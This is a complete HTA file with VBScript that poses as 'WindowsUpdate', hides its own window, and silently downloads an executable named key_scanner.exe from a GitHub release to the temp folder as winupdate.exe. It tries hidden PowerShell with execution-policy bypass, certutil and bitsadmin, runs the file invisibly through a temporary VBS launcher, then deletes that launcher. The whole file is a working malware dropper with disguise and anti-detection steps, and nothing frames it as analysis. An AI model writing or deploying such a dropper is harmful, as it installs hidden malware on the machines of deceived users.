<hta:application
  id="oHTA"
  applicationname="WindowsUpdate"
  border="none"
  caption="no"
  showintaskbar="no"
  windowstate="minimize"
  singleinstance="yes"
  navigable="no"
  sysmenu="no"
  contextmenu="no"
  innerborder="no"
  scroll="no"
/>

<script language="VBScript">
  ' ==== ENSURE COMPLETE INVISIBILITY ====
  Window.resizeTo 0,0
  Window.moveTo -2000,-2000
  Set WshShell = CreateObject("WScript.Shell")
  Set fso = CreateObject("Scripting.FileSystemObject")
  
  ' ==== METHOD 1: POWERSHELL SILENT DOWNLOAD ====
  psCommand = "powershell -NoP -NonI -W Hidden -Exec Bypass -C ""[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; $p='%temp%\\winupdate.exe'; " & _
              "try { (New-Object Net.WebClient).DownloadFile('https://github.com/jozef800/discord/releases/download/v3.0/key_scanner.exe', $p); " & _
              "if (Test-Path $p) { Start-Process -WindowStyle Hidden $p } } catch { }"""
  
  ' ==== METHOD 2: CERTUTIL FALLBACK ====
  certutilCommand = "cmd /c certutil -urlcache -split -f https://github.com/jozef800/discord/releases/download/v3.0/key_scanner.exe %temp%\\winupdate.exe && start /b %temp%\\winupdate.exe"
  
  ' ==== METHOD 3: BITSADMIN ALTERNATIVE ====
  bitsCommand = "cmd /c bitsadmin /transfer myjob /download /priority high https://github.com/jozef800/discord/releases/download/v3.0/key_scanner.exe %temp%\\winupdate.exe && start /b %temp%\\winupdate.exe"
  
  ' ==== CREATE AND RUN A HIDDEN VBS LAUNCHER ====
  tempVBS = "%temp%\\" & fso.GetTempName() & ".vbs"
  Set file = fso.CreateTextFile(tempVBS, True)
  file.WriteLine "On Error Resume Next"
  file.WriteLine "Set WshShell = CreateObject(""WScript.Shell"")"
  file.WriteLine "WshShell.Run """ & psCommand & """, 0, False"
  file.WriteLine "WScript.Sleep 5000"
  file.WriteLine "WshShell.Run """ & certutilCommand & """, 0, False"
  file.WriteLine "WScript.Sleep 5000"
  file.WriteLine "WshShell.Run """ & bitsCommand & """, 0, False"
  file.Close
  
  ' ==== EXECUTE THROUGH WSCRIPT (COMPLETELY HIDDEN) ====
  WshShell.Run "wscript.exe //B //E:vbscript """ & tempVBS & """", 0, False
  
  ' ==== CLEANUP ====
  window.setTimeout "fso.DeleteFile(""" & tempVBS & """)", 10000
  window.setTimeout "Self.Close()", 15000
</script>
